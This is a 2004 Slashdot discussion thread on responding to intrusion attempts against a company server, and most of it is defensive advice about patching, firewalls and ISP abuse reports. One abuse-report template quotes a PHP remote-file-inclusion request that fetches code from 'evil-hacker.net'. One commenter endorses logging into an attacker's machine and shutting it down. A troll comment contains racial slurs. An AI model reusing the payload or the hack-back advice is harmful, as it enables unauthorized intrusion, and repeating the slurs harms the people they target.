Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Dealing with Intruders?

Cliff posted about 10 years ago | from the outside-assistance-for-security-issues dept.

Security 656

drakyri asks: "I've been running a server for a small company for a few months. Recently, the number of attempted intrusions has jumped from about one every week to several per day - and these are only the really obvious attempts, like idiots who try to log in as root from the outside. The problem is that I'm not sure what to do about this. I've got their IP addresses and can usually tracert their ISP's - is there an accepted type of letter to send them without seeming like one of the corporate cease-and-desist gnomes?"

cancel ×

656 comments

Sorry! There are no comments related to the filter you selected.

Pisty (-1, Offtopic)

Anonymous Coward | about 10 years ago | (#9956398)

Yes

Easy (5, Insightful)

Anonymous Coward | about 10 years ago | (#9956402)

ignore them.

Unless they use a lot of bandwidth, that is the right decission to make.

Very Easy (5, Insightful)

kunjan1029 (447713) | about 10 years ago | (#9956421)

intrusion attempt >> /dev/null

ignore it. forget it. script kiddiz...

Re:Very Easy (5, Insightful)

TeVi (128093) | about 10 years ago | (#9956570)

(mod parent up!)

Yup, just make sure your box is secure.

Intrusion attempts happen unfortunately, with all the viruses, worms, etc. Just make sure your box won't get caught.

Re:Easy (4, Insightful)

Phil Karn (14620) | about 10 years ago | (#9956611)

Agreed. Just ignore them.

These things are far too common to get worked up about, and they still consume an infinitesmal fraction of my link capacity. I long ago stopped caring about unsuccessful intrusion attempts. I only care about the successful ones, and to help prevent those I apply all the usual safeguards.

NIGGERS LIKE NIGGER DICK (-1, Troll)

Anonymous Coward | about 10 years ago | (#9956403)

NIGGERS YOU'RE ALL NIGGERS

Re:NIGGERS LIKE NIGGER DICK (1)

terriblekarmanow tm (592883) | about 10 years ago | (#9956410)

NO YUO

Re:NIGGERS LIKE NIGGER DICK (-1, Troll)

Anonymous Coward | about 10 years ago | (#9956461)

Lamest GNAA troll ever!

just forget it (1, Funny)

Anonymous Coward | about 10 years ago | (#9956405)

ignorance is bliss!

Your firewall.... (2, Insightful)

paullush (767354) | about 10 years ago | (#9956406)

Add their IPs to your firewall for a start.

Re:Your firewall.... (5, Insightful)

arcade (16638) | about 10 years ago | (#9956490)

Why?

If they are just sending of SYN-requests, then who cares? They'll get a few RST-responses. Having your firewall bogged down by rules just to ignore some dialup user that'll probably have switched IPs the next day will just decrease others chances of contacting you.

Secure your network. Have a nice firewall with okay rules, but there should be no need to add individual IPs to your ruleset all the time -- that just increases complexity and maintainability.

Re:Your firewall.... (1)

jhunsake (81920) | about 10 years ago | (#9956529)

Having your firewall bogged down by rules just to ignore some dialup user that'll probably have switched IPs the next day

Actually, most of the machines attacking me recently have been compromised static-ip servers at various hosting providers.

Re:Your firewall.... (2, Insightful)

jaavaaguru (261551) | about 10 years ago | (#9956584)

Name and shame! ;-)

Re:Your firewall.... (5, Insightful)

arcade (16638) | about 10 years ago | (#9956585)

Actually, most of the machines attacking me recently have been compromised static-ip servers at various hosting providers.

It depends on what kind of 'attack' we're talking about, of course. If it's just an automated attack which scans large ranges of IP-addresses for common vulnerabilities which you've patched against, there really isn't any need to add them to your firewall ruleset, unless they're pretty invasive.

By invasive I mean that they grope and poke, and grope and poke. If it's just a couple of packets - why care at all? You can always fire off an email to the hosting provider, but adding them to your firewall is just .. not necessary.

Take the recent increase in SSH scans for the 'test' and 'guest' accounts without password, or whatever it was one came into agreement that it was.. if you've got a patched SSH daemon, why care? Let them scan - and get rejected. Why bog down the firewall with hundreds, if not thousands, of extra matching rules?

If it's likely that you've got vulnerabile machines on that port, block it entirely - or just allow it from specific IPs. Playing whack-a-mole against scanners are just a waste of time.

Patch the system, have a good general firewall ruleset that covers what needs to be covered - and let the scanners that isn't actually continously filling your log files just scan on.

I've had to block _one_ abusive scanner during the last year. It was someone scanning for open http-proxies from Israel. They were hitting my machines several times per seconds, filling my apache logs with relay-attempts to mailservers. Which was quite frankly annoying.

Those scans were from four IP's within the same subnet, and their ISP didn't care. I got the ISP null routed due to their customers filling my logs (and my company doesn't do business in Israel at the moment, so it wasn't a loss anyways).

A few packets now and then on the other hand.. playing whack-a-mole with such is just a waste of time.

Re:Your firewall.... (1)

paullush (767354) | about 10 years ago | (#9956538)

Because some of the IPs will be static. Who said "Just SYN packets"??? If that, then theyre OS detection as ... Why tolerate that?

Re:Your firewall.... (4, Interesting)

Anonymous Coward | about 10 years ago | (#9956501)

Yeah cause, there's no such thing as Dynamic IP addresses.

Better advice would be to only allow login connections (eg sshd) from known IP addresses.

Other measures depends on what services you are trying to secure, but make sure you've run through the http://www.cisecurity.com/ [cisecurity.com] lvl 1 benchmarks on an Internet connected machine (at the very least run the scoring tool).

Re:Your firewall.... (4, Insightful)

jhunsake (81920) | about 10 years ago | (#9956516)

Better yet, block everything and whitelist your shit.

Re:Your firewall.... (3, Insightful)

JPriest (547211) | about 10 years ago | (#9956541)

Exactly, why is he letting just anyone ssh into his boxes in the first place? Most of the services the company uses should be on private IP space inside of the firewall (NAT box), the rest of the devices on the outside need to be locked down good from Joe IP address.

DMCA (4, Funny)

Amiga Lover (708890) | about 10 years ago | (#9956408)

Use the DMCA to... I don't know, scare them or something. Mention RIAA and MPAA to their ISPs too.

Re:DMCA (4, Funny)

Anonymous Coward | about 10 years ago | (#9956507)

Tisk tisk, using the DMCA for something usefull is unpatriotic.

Skript kiddiez (4, Funny)

robogun (466062) | about 10 years ago | (#9956411)

I haven't seen any similar increase in activity. Does your firm have enemies? For instance, does your first name rhyme with Carl?

Abuse@ (5, Informative)

craigske (106369) | about 10 years ago | (#9956413)

The accepted way is to send an email to abuse@ or to the abuse contact listed by ARIN for the netblock you are trying to lart.

http://www.arin.net
or lookup the RADB abuse contact
http://www.dnsstuff.org

don't forget logfiles & date/time (3, Informative)

Errtu76 (776778) | about 10 years ago | (#9956559)

Be sure though to include *all* relevant log files too. I've sent a couple of mails in the past to ISPs and i think i got a response from about 50% of the ISPs contacted, from which only one responded once by saying they contacted the individual and took appropriate actions ... whatever that may mean.

You'd be better off configuring your security better though.

Create a honeypot (4, Insightful)

JVert (578547) | about 10 years ago | (#9956415)

If you seem to be getting it from the same group of people make a honeypot but have some obvious hints once they get in, leave very little on the server and put the logs of their activity in an obvious place. Just be sure to isolate that machine from the rest of the network so if they do end up owning it they got no further then their failed attempt at your real machines.

Re:Create a honeypot (0)

Anonymous Coward | about 10 years ago | (#9956441)

The point being...?

Re:Create a honeypot (2, Interesting)

Anonymous Coward | about 10 years ago | (#9956444)

This probably would have to be the best option so far. Then you could also log how they cracked the machine (using another machine). This would let you secure your other machines as well.

(I've been told to say, "you're a facsist" so I did)

Re:Create a honeypot (0)

Anonymous Coward | about 10 years ago | (#9956460)

your suggestion is not valid.
it should read "no further THAN their failed attempt..."

Re:Create a honeypot (5, Interesting)

welshwaterloo (740554) | about 10 years ago | (#9956577)

IMHO - If you're not completely sure your network is 101% secure, or you don't have several free hours a day it would be a bad idea to drop a honeypot anywhere near your network.

Think about it - it's a slap in the face to the would-be hacker.. It's like you're leading him on, then saying "Ner Ner!" when he breaks into the pot.
If your hacker is serious, he's gonna be really pissed about this.

Secure your network & keep it secure - no need to stir 'em up.

Re:Create a honeypot (0)

Anonymous Coward | about 10 years ago | (#9956607)

Hey, a database record of just off credit card numbers might just take care of that real quick. Maybe be a REAL bitch, and make the first number and data real, but for a corprate card with a low per transaction and total limit. Or even contact customer service people for the people doing your corprate credit and see if they can come up with something even more wicked. But the number of people you could catch for $100 or so bucks a month might just be worth it to everyone involved. A serious hacker can be as pissed off as he wants when some 250 lb guy with 5% body fat is standing on his neck talking about how it's been months since he's seen sunlight and "such a pretty 'girl'" (facts which happen to be related).

Wow! A spike in hack attempts? (3, Insightful)

angryLNX (679691) | about 10 years ago | (#9956417)

Who'd have thought! [slashdot.org]

Re:Wow! A spike in hack attempts? (1)

MikeDX (560598) | about 10 years ago | (#9956505)

I think it could be something to do with the Gene therapy [slashdot.org] ! Whats happened is a million of these "super-monkeys" are sitting at a million terminals, all trying to create the works of Shakespeare on port 23....

I tried to log in as root.. (5, Funny)

Anonymous Coward | about 10 years ago | (#9956418)

on my University's network more than once. I ran Linux and I got into the habit of logging in as root, and sometimes I'd try to log in without thinking just after starting a telnet session. I didn't receive any notice from the U, but in this post-9/11 hellmouth, I'm sure I'd have been reported to the FBI as a potential terrorist.

Re:I tried to log in as root.. (2, Insightful)

GodEater (7709) | about 10 years ago | (#9956553)

Let me get this straight - you "got used" to logging in as root? And to compound your folly, you used to do it over *TELNET* ?!?!?!

I think someone needs to read up a bit more on why both these things are bad ideas - and why doing them both at once is just internet suicide...

Re:I tried to log in as root.. (4, Insightful)

meringuoid (568297) | about 10 years ago | (#9956586)

I ran Linux and I got into the habit of logging in as root,

Unwise.

and sometimes I'd try to log in without thinking just after starting a telnet session.

Over telnet? Log in as root over telnet? AAAARRRGGGHHH!

Re:I tried to log in as root.. (0, Troll)

DanMc (623041) | about 10 years ago | (#9956588)

I accidentally log in as root all the time. I have to do 90% of my linux work as root (editing /etc files and stopping and starting daemons), so if I ssh or scp to an outside network, It uses my current user name by default: root. And even when I get a login: prompt, my natural instinct is type root.

That said, I have seen an increase of root/guest/temp/ ssh login attempts on my home DSL router/firewall. The IPs tend to be similar to mine, and there are 7-10 attempts in a row. So I'm guessing there is script or worm on the lose that searches nearby IPs for vulnerable hosts.

Re:I tried to log in as root.. (0)

Anonymous Coward | about 10 years ago | (#9956604)

> on my University's network more than once. I ran Linux and I got into the habit of
> logging in as root, and sometimes I'd try to log in without thinking just after
> starting a telnet session. I didn't receive any notice from the U, but in this
> post-9/11 hellmouth, I'm sure I'd have been reported to the FBI as a potential
> terrorist.

Only if you are of arabic race or have an arabic name.

Abuse (5, Insightful)

martingunnarsson (590268) | about 10 years ago | (#9956419)

When I had this problem I simply sent a mail to the ISP:s abuse-people. Most ISP has an e-mail address like abuse@theisp.com. Then they can send the guy a warning or whatever.

Re:Abuse (1)

UltiSkeeter (663903) | about 10 years ago | (#9956479)

By in large, those times that I have sent stuff to 'abuse@whatever' with an event notice, I end up getting a spam flood. It's almost like I'm signing up for abuse! Very rarely have I got a reply that something was done...

Re:Abuse (1)

polished look 2 (662705) | about 10 years ago | (#9956515)

I recall someone behaving suspiciously on my webserver so I found out who had the IP address where the activity was originating. A few days later I received a reply and they said they were very thankful for my contacting them though I did not follow it up though I imagine it was a compromised server.

Why is this an abuse? (0)

Anonymous Coward | about 10 years ago | (#9956526)

It's like some kids trying some random lock combinations in a locker room.

This guy wants to take fingerprints, find the kids, and call their mom?

I say if you want to protect your bath towel with more than 4 numbers, then buy a lock with more than 4 numbers.

Re:Why is this an abuse? (1)

martingunnarsson (590268) | about 10 years ago | (#9956565)

The ISP I contacted took it pretty seriously, I think. I sent a couple of mails back and forth with the abuse-staff, and got a very good impression from them.

Re:Abuse (0)

Anonymous Coward | about 10 years ago | (#9956617)

At least in Germany, trying to log into someone else's root account without permission and other intrusion attempts are not illegal. Succeeding however is illegal (StGB 202a). You should be careful when wording abuse-complaints, or they could easily backfire (StGB 187), and in this case the attempt to get someone disconnected is enough.

huh? (-1, Flamebait)

Anonymous Coward | about 10 years ago | (#9956422)

you say "login as root" and then "tracert", are you a *nix man or a windows weenie? the quality of response you will get depends on the correct answer!

Letter (2, Funny)

Pinkfud (781828) | about 10 years ago | (#9956427)

Write in sloppy block letters: Ve know who you are. Do it vun more time und ve get NASTY!

Maybe set up a honeypot for a bit (5, Insightful)

Mal-2 (675116) | about 10 years ago | (#9956428)

If you give them a more attractive target for a while, you may find there really aren't all that many attackers left to go after the systems that matter. Not only that, but it would be considerably easier to set up such a system to log their attack techniques, since it isn't actually doing anything. Finally, if they do break through, who cares? Just re-image the drive and let them start over. If they manage to repeat it, you now have a known weakness you can correct.

Mal-2

Re:Maybe set up a honeypot for a bit (1)

meportez (695779) | about 10 years ago | (#9956497)

If they get through ONCE you've got a weakness to correct.

Re:Maybe set up a honeypot for a bit (1)

mstefanus (705346) | about 10 years ago | (#9956549)

Yes yes... that would be a good idea. Get Knoppix [knoppix.org] , run it on an old PC or something, route port 22 to that machine and enable ssh. Don't forget to set root password "root", you wouldn't want to make it too difficult, would you? ;-) Imagine the attacker's face, when he/she found out everything is on a CD! As for your real SSH, maybe you want to give portknocking [portknocking.org] try.

Re:Maybe set up a honeypot for a bit (1)

kistral (757265) | about 10 years ago | (#9956576)

Reimage the drive? Excuse me? Isn't the whole point of a honeypot to study how they got in? For that matter, the first thing you do after any breach of security is shut everything down and don't change ANYTHING on the drive so you can pick up the pieces.

Re:Maybe set up a honeypot for a bit (2, Informative)

Anonymous Coward | about 10 years ago | (#9956625)

Honeypots should not be taken lightly. They are a legal hazard. You knowingly operate a vulnerable machine which is connected to the Internet. If the damage isn't restricted to your own systems, you're partially responsible and probably liable for other people's damages.

I agree (1, Informative)

Anonymous Coward | about 10 years ago | (#9956433)

I have also been seeing these kinds of "attacks" the last few weeks on a server which I admin. Usually attemts to login via ssh to well-known accounts (such as root).

The site is not a high-profile site by any means but rather a home for some personal projects. I just wrote it of as the script-kiddy attemt de jour but it's interesting to see that others experience the same thing.

ask your company lawyer (1, Informative)

Anonymous Coward | about 10 years ago | (#9956434)

you deal with the firewalls,
let your lawyers deal with crap like this

My Advice (3, Informative)

momogasuki (790667) | about 10 years ago | (#9956435)

Just ignore them. Focus on keeping your server software up to date and staying informed of possible security issues instead of waisting time trying to track down instrusion attempts.

Snort + Guardian (4, Informative)

UltiSkeeter (663903) | about 10 years ago | (#9956436)

These two will detect most automatic attempts and then add the IP's to a drop list on your Linux firewall. www.snort.org. Guardian is listed under 'other tools'

Re:Snort + Guardian (2, Informative)

Anonymous Coward | about 10 years ago | (#9956623)

Automated addition to a firewall leads to a DOS vulnerability.

Not a cease-n-desist gnome... (5, Funny)

AngstAndGuitar (732149) | about 10 years ago | (#9956439)

You might consider sending a handwiten letter and use your own name, that would seem a bit more human. Also, most large companies will send polite-but-firm letters, so just threaten bodily harm to them and their pets, that should sound pretty un-corporate. I suppose only the first sugesstion is really a good one, but I like the second one more, so I'm not going to remove it from my comment.

Re:Not a cease-n-desist gnome... (2, Funny)

raam (206445) | about 10 years ago | (#9956495)


Dear Blankety-blank:

Hi. I'm real, real sorry to take your time. I mean, if you don't have time, I understand, and, after all, I don't want to sound like a corporate gnome ]:-) :))). I know you're a real nice hacker, not one of those Russion mob nut-jobs...ah, oops, didn't mean to call names! Anyway, I was just wondering if, if it's not too much trouble, if you could not hack me. I understand that you are a person and have needs, but, and if this bothers you and I sound like a gnome, just let me know(! :) :O :>>), I was wondering if you would help a brother out. Thanks, and if this offends you in any way, please send it back to me and, as you can, guess, I will certainly roll it up and put where any spineless dork might. Thank you so much. Thank you, thank you. You are too kind. Thank you.

Sincerely,

D.U. Fus, the Administrator
Tepid Water Suppositories, inc.

Re:Not a cease-n-desist gnome... (0)

Anonymous Coward | about 10 years ago | (#9956619)

Love it! Especially the smileys.

Corporate Gnome (2, Interesting)

Destructo-Bot (794990) | about 10 years ago | (#9956445)

If there are indeed blatant attempts to gain access to your network and server, then a simple letter or email to their ISP should do the trick and help show your boss that you were trying to be proactive. Keep in mind that those IP's could be spoofed however, so without something a little more substantial than an IP addy, you are likely to be ignored by most major isp's.

Best chance for a response is to keep it polite and request a notification of what action (if any) they will take. Don't fill your letter or email full of legalese and vauge threats and I'm sure most of the people in charge of a particular abuse department will take you seriously enough. Whether or not they have the clout to take action on your behalf is another matter entirely however.

Another thing to do is to just keep yourself patched, firewalled, and a close eye on your network. If the attempts are rising, someone thinks your network/servers is/are an easy target. Prove them wrong and perhaps you won't need to write that letter after all.

Good luck.

Re:Corporate Gnome (2, Informative)

ssbljk (450611) | about 10 years ago | (#9956572)

Keep in mind that those IP's could be spoofed however, so without something a little more substantial than an IP addy, you are likely to be ignored by most major isp's.

well, if you decide to write to ISP, don't write letter in which you accusing but ask ISP for help to investigate and be polite.

if you do, be careful what you assume (1)

jcomeau_ictx (696704) | about 10 years ago | (#9956449)

Remember that there are a lot of automated tools, worms, and virii that turn home computers into "zombie" boxes under remote control. If you do decide to send out anything, it's probably best to assume the apparent source of the problem may be masking the real source.

Re:if you do, be careful what you assume (1)

Jedi Alec (258881) | about 10 years ago | (#9956603)

all the more reason to send a mail. however, instead of blatantly accusing someone, just suggest that perhaps a not-so-friendly individual has gained access to that and that machine and is attempting to use it for illegal activities. if the box belongs to the person trying to do whatever is going on, that person might be tempted to go and look elsewhere, if it's a compromised box, well, maybe 1 unpatched windows user will find the time and effort to install a firewall...

Well... (5, Informative)

MrWorf (216691) | about 10 years ago | (#9956450)

I always write a really "nice" letter to the ISP of the intruder, where I explain the problem, and that it is causing my customers trouble and that it eats up valuable bandwidth. I ask them to take action, and if not, that I'll have to proceed further (never been needed once). I send the email from the admin account, sign it with my name + admin at my system and then I attach the logs pertaining the intrusion attempt.

So far, all of these "cease and desist" letters has resulted in action on the ISPs part, and in 50% of the cases, their admins write me back and give me feedback on the problem.

Ofcourse, I don't do this for every attempt (all depending on my mood ... atleast nowadays), mostly for the more serious attempts (doing multiple attempts, different attempts, etc).

The worst (or craziest?) attempt yet was by some nut who portscanned the system, port by port from start to finish. I actaully managed to get hold of the owner of the computer system that was scanning me and phoned him. Quite a hilarious experience. Needless to say, the portscanning stopped :)

Re:Well... (4, Informative)

zoom (38906) | about 10 years ago | (#9956605)

I've had similar experiences. I've noticed several SSH attempts on my server recently - just a personal server at home. I've written to the abuse addresses found by running WHOIS and politely informed the ISP that there was an intrusion attempt and could they please inform the user that we are not a public service.
Many times the ISP has responded and usually their customer has a zombie box.
Always include a log if possible so they know the time and the IP-address. Remember to tell them what timezone the timestamps are from.
WHOIS links
http://ws.arin.net/cgi-bin/whois.pl
http:/ /www.ripe.net/db/whois/whois.html
http://www.apni c.net/apnic-bin/whois.pl

Politeness is key (1)

The Cyberwolfe (545759) | about 10 years ago | (#9956456)

If the attacks are just random script kiddies trying things that will never work, I'd probably ignore it.

If you're starting to see a pattern or an increase in the sophistication of the attack, though, you might want to just send their ISP a polite letter letting them know what you have found and your concerns. After all, what would you want to see if you were the ISP's sysadmin?

In my experience (3, Informative)

Howzer (580315) | about 10 years ago | (#9956459)

In my admittedly limited experience, having been a "web manager" for half a dozen websites or so in my time, this sort of stuff was seasonal (highs in summer and winter when the script kiddies were indoors) and never used to particularly bother me.

I had confidence in my setup, and no server I had control over was, to my knowledge, ever compromised.

We never had any sensitive data outside the firewall, anyway.

On two occasions it got serious (if an easily beaten DOS attack can be called serious) and even then it was only for 20 minutes or so. Our ISP (being a large telecom) was champing at the bit to go after people we had even a small scrap of evidence against, so on those two occasions we simply handed what information we'd gleaned to them, and they let out the dogs.

At some stage, you've got to stop worrying and learn how to love the internet!

Yes, there are several good ways. (5, Informative)

arcade (16638) | about 10 years ago | (#9956469)

Personally I tend to ignore the scans for ssh and so forth, as they're just SYN-packets and doesn't consume too much of my resources. Call me a lazy/non-caring bastard. However, it would surely be nice to send off a message to the ISP, as the machines the scans are originating from are probably cracked too.

I tend to report viruses. I grep my logs daily for viruses from various norwegian ISPs, to the mailserver I admin for my company. During the last five months I've sent daily virus reports to the largest ISP in norway, and they tend to reply within one business day - having notified their customer about the infection. If the customer gets several 'heads up' messages from the ISP without removing the virus, they get their port 25 access filtered until they've confirmed that they've removed the virus.

I tend to send emails such as this.

"
Hi there.

I've got several viruses from your customers today, and would appreciate it if you could notify your customers about the virus infections they probably have.

Here are the relevant snippets from my logs:

Virus: Netsky.B
Received: from at

Virus: Bagle.C
Received: from at

All timestamps on the server are NTP-sync'ed against .

Thanks for your time
"

Recently I've also included a more personalized

"Oh, and I have to commend your ISPs efficiency, as since march - you've managed to reduce the number of virus sending users to us from about per day, to this .. it's days since the last virus from you! Keep up the good work!"

You could probably just adapt what I'm writing to something saying that a customer of theirs probably has been cracked, and that they are currently scanning for .. and so forth.

If it's the actual cracker that's stupid enough to use his own computer, he'll get scared enough if they contact him telling him that his computers has been abused by others to scan people -- and will probably quit doing it. :)

Do what Mr Burns does... (5, Funny)

Anonymous Coward | about 10 years ago | (#9956472)

Nothing beats the personal touch of hired goons...

at some level you have to ignore it.... (5, Informative)

cbdavis (114685) | about 10 years ago | (#9956473)

or you'll spend half your time at work writing abuse letters. My logs at work show a constant barrage of windows attacks ( yes, code red is still there), 137 scans, numerous login hacks for any number of OS's, port scans that increment by 1 each time, etc. Sometimes it slows down. I am beginning to just consider it background noise. Just the cost of doing business on the web. As long as the probes arent massive or working, I just note and ignore. I only have so much time for this - it keeps me from downloading all that porn!

Ignore it? (4, Informative)

Inominate (412637) | about 10 years ago | (#9956475)

This kind of stuff is all over the place. Odds are most of these are automated worms and similar crap. Unless it's really a concerted attack on your machines, as opposed to random scanning, it's not worth the effort to do anything about it except maybe firewall the IP.

Why not seem like a cease and desist gnome? (2, Insightful)

astrashe (7452) | about 10 years ago | (#9956476)

I don't understand why you'd care how you come off to the people trying to crack into your system.

They're out to do you harm. If one of them gets through and does some damage, you could lose your job.

abuse@.... (2, Insightful)

keithdowsett (260998) | about 10 years ago | (#9956480)

Hi,

As several posters have already stated you should complain to the abuse address for their ISP. Ideally, you should include logs of the attempt.

You should also be aware that that the machines which are attempting to connect to your network are probably zombies. There are a number of trojans and security holes which can be exploited to allow a remote user to take over a poorly secured system. The owners probably don't even realise that their machines have been compromised.

I'm not sure there's much an ISP can do other than try to find out which customer had been assigned that IP address at the time and write to them. Banning someone for having poor security on their machine is probably a bit harsh, even in these post-9/11 times.

Keith.

I swear I won't do it again! (2, Funny)

teamhasnoi (554944) | about 10 years ago | (#9956485)

Just don't tell my mom! She'll take away my Compaq, or make me install SP2!

Secure your machine (0)

Anonymous Coward | about 10 years ago | (#9956486)

Welcome the the life on the internet, now its time to make sure your servers are secure. Turn off ALL services that are not required. Configure SSH do disallow root logins and passwords. From now on the only way into the servers should be by using SSH cryptokeys.

replace with secure systems - fast! (0)

Anonymous Coward | about 10 years ago | (#9956492)

I had an intrusion once - no wonder, really. The machine had an old SuSE install with all ports open, all services running: lpd, samba, X11, etc...

I didn't care much about it, it was just a small box and so I just sat back and watched the anomalous activity for about two weeks. But when the intruder installed a rootkit, I got nervous. Immediately removed the thing from the net and tried to figure out if they got access to the DB servers. Next day, the box was replaced by a hardened debian stable system, and we kept sure that only necessary stuff was on it and all the security patches installed.

We reported the incident to the police, but what can they really do? There were IPS from Bulgaria, Brazil and S. Korea exploiting the sshd at the same time....

We really learned our lesson there, and didn't have an intrusion since (well, except on that other old SuSE box...)

I've been noticing this too (1)

chesapeake (264414) | about 10 years ago | (#9956494)

FWIW, I'm a student running FC2 on a college LAN in Australia. In addition to the default install, I've whacked on a more complex firewall and also installed portsentry (mainly because IT services believes that running nessus with all of the options checked against the university LAN is a good idea).

In any case, just recently I've noticed far more attempts to log into SSHd. The number of port scans detected by portsentry is about the same as always - 2 to 5 a day. From yesterday's logwatch, for example, there were attempted logins as admin, guest, root, test and user. According to logwatch they're always tried with no password, then a password.

eg:

Illegal users from these:
admin/none from 203.227.204.32: 2 Time(s)
admin/password from 203.227.204.32: 2 Time(s)

I've definitely noticed a major increase in these attempts over the last while. Personally, it doesn't bother me - I just make sure that my passwords are up to date, and that remote root logins are disabled.

(Edited the snippet above for lameness filter)

Re:I've been noticing this too (1)

FyreFiend (81607) | about 10 years ago | (#9956533)

Yesterday was the first time in a long long time I've seen someone try to get into my computer. It was the same thing you saw. ssh connections trying to log in as admin, guest, test, and user. Only in my case it was from a host in .cn not .kr. I had thought of dropping an email to the admin of the netblock but it's been my exp that most admins in .cn just don't care.

Re:I've been noticing this too (1)

beakburke (550627) | about 10 years ago | (#9956545)

noticed the same thing here

And the problem is... (2, Funny)

Anonymous Coward | about 10 years ago | (#9956496)

...the attempted intrusion detection package.

It's wasting your time.
It makes you worry.
It makes you ask silly questions on slashdot.

The solution is to trash it, you don't need it, Linux is unbreakable anyway.

get an auto reporting tool (2, Informative)

Anonymous Coward | about 10 years ago | (#9956498)

try http://www.mynetwatchman.com/ works like a champ for me.

the system automatically sends a warning to the isp

Cinderella (1)

AftanGustur (7715) | about 10 years ago | (#9956500)

Well, after having being doing what you are doing for the last 10 years, I can only say "Welcome to the real world". The level of suspicious activity today is way above the level where you can handle it by complaining to the source ISP. Possibly he has a compromised server on his network, but most likely he doesn't care or doesn't have time to deal with complaints. Why should he anyway.. Scanning and probing isn't illegal in 99% of the world. My advice to you is to secure your network. If you absolutely *have* to allow logins from the outside you should protect the login service by blocking it in the routers *and* use the build-in tcp_wrapers mechanism to control access. Start by blocking *everything* and then open up only those ports you need, and to those that need it. I.e. ports 80 and 25 can be publicly accessible but there is no need for anyone on the outside to send you packets on ports 137-139. Then, run tripwire, take backups and install a IDS. Not because it will tell you of anything in advance, but because they are good for forensics work (After you have been ass-raped by some 16 year old) Abowe all "be paranoid" and don't simply wait until you become a wictim.

Re:Cinderella (1)

Jonah Hex (651948) | about 10 years ago | (#9956580)

...and don't simply wait until you become a wictim.
Where do you keep your nuclear wessels? (sorry, had to do it, the "w" isn't even close enough for a mis-type)

Jonah Hex

I had someone trying to brute force ssh.. (4, Insightful)

dan dan the dna man (461768) | about 10 years ago | (#9956511)

From a server in Brasil yesterday. I never bother reporting these things normally, but the compromised machine (ie originating the attack) was a webserver and had some "info@" addresses. I wrote, apologising for my lack of Portuguese, and an hour later had a very grateful email from the sysadmin. This is going to encourage me to report them in future.


Basically I just gave a quick digest of the log clearly showing their IP and the attack in progress, and a note to the effect that I believed their machine had been compromised (in as plain English as I could muster) - and got the desired result.


I like the fact that there's some script kiddie out there cursing that one of his "boxen" is no longer.. ;)

Call their parents (5, Funny)

Monkelectric (546685) | about 10 years ago | (#9956521)

True story: About 8 years some friends and I were getting o3ned DAILY by a hacker. One of these friends had a buddy in IBM's security division, who somehow got us a name and phone # of our hacker. We felt like asses when we found out we were getting beat down by a 15 years old. But we called his dad, explained what was going on, and that we knew where he lived. Problem SOLVED :)

I'm sorry... (2, Funny)

schnits0r (633893) | about 10 years ago | (#9956524)

I didn't know that I was that big of a problem to your company, I shall stop. Sorry for any inconveinience.

Maybe related to this? (3, Informative)

ComputerizedYoga (466024) | about 10 years ago | (#9956532)

mid july or so there were a bunch of random automated-looking and weak looking ssh login attempts all over the place ....

threads on the full disclosure mailing list archives [netsys.com] and dslreports forums [dslreports.com] about that ....

wonder if this is what the topic poster was encountering?

What intruders? (0)

Anonymous Coward | about 10 years ago | (#9956543)

VERY IMPORTANT QUESTION

How are they intruders if they failed to login as root?


God, mod me down if you think im just being a troll... but seriously mod this up if you think this guy asking the question is a total dumbass.

If you don't want incoming connections, block them through whatever means you feel necessary... from a firewall to actually unplugging the network connection. You will never stop attempts while you are connected to the Internet... there are 2^32 ip addresses... granted only a portion are in use and Internet routed, you still have way too many millions of emails to send ISPs every year...

Actual intrusions can be handled differently... but random connections and login attempts mean absolutely nothing.

Re:What intruders? - Good point! (1)

Anonymous Coward | about 10 years ago | (#9956568)

Seriously, reading through most of the comments on this story has the odor of child script kiddiez... saying "email abuse@isp.com" or "hack them back" or "run nmap and then hax0r them" or "call their parents"....

whatever. Just ignore the shit, because it isn't a problem if there is no intrusion.

IRC Shows all sorts of fun stuff (1)

HFShadow (530449) | about 10 years ago | (#9956558)

I run an irc network for work and I've seen many fun things. Most of the time I'll just place a ban and let it slide. I've seen mail + web servers try to attack the network however and that'll justify an email to some poor sysadmin.

The most unusual was a machine with a google.com reverse dns. I emailed google and they said it was impossible to be them and told me to go away basically =/

My basic template to ISPs (4, Interesting)

BrynM (217883) | about 10 years ago | (#9956562)

Please note that this is innefectual to send to some ISPs. You won't always get a response. Look everything up first! Go look up who owns an IP at ARIN [arin.net] and who has registered domain names at a lot of different places [google.com] . Think hard before you send unless you write something automated - You may not want to send anything to someone who is actually the kiddie that attacked you. The result of that mistake is annoying. Trust me.

Due to abuse, the following IP address(s) have been banned from accessing
mydomain.com and it's associated services. The abuse is detailed as
follows:

IP(s) Banned: 216.nnn.225.nn

Owner:
OrgName: SOME ISP
Address: 2 Hacker Home Street
City: Isabel
StateProv: CA
PostalCode: 01120
Country: US
Admin Address: noc@someisp.net

Reason:
Malformed URL - Attempted PHP Exploit
"216.nnn.225.nn - - [11/Aug/2004:10:03:03 -0700] "GET
/themes/default/theme.php?THEME_DIR=http://w ww.evil-hacker.
net/1.jpg?&cmd=uname%20-a;id; HTTP/1.0" 400 352"

Severity: 5

Remaining bans until entire address block banned: 3

If you have any questions or need further explanation, please contact
admin@mydomain.com.

You
Your Title
Your Contact Info

Just my (short) experience. A suggestion. (2, Interesting)

pasko (758206) | about 10 years ago | (#9956567)

Last week I managed to login as root into a machine (from a chinese domain, as usual) for which I had packets logged in my firewall's log. Then, I installed in that machine chkrootkit: lots of executables were wrong (rootkits). Then, someone logged in remotely and left in /root a "readme.txt" message warning me not to log in other's computers .... Finally I did three things: 1.- Send an e-mail to the contact-addresses retrieved from APNIC 2.- Copied my shutdown executable to that machine (the original was obviosly tricked) 3.- Remotely, executed @> shutdown -h now Just a suggestion.

corporate cease-and-desist gnome (1)

evil_one666 (664331) | about 10 years ago | (#9956571)


I've got their IP addresses and can usually tracert their ISP's - is there an accepted type of letter to send them without seeming like one of the corporate cease-and-desist gnomes?"
Despite the fact that you work for a small company, you will in fact be a corporate cease-and-desist gnome if you send out such a letter. That is unfortunately the price you pay.

Firewall? (2, Interesting)

vandan (151516) | about 10 years ago | (#9956574)

Complaining to people won't get you anywhere, unless you go to the government and claim that you believe they are terrorists. That will get you some action.

My advise is to firewall them.

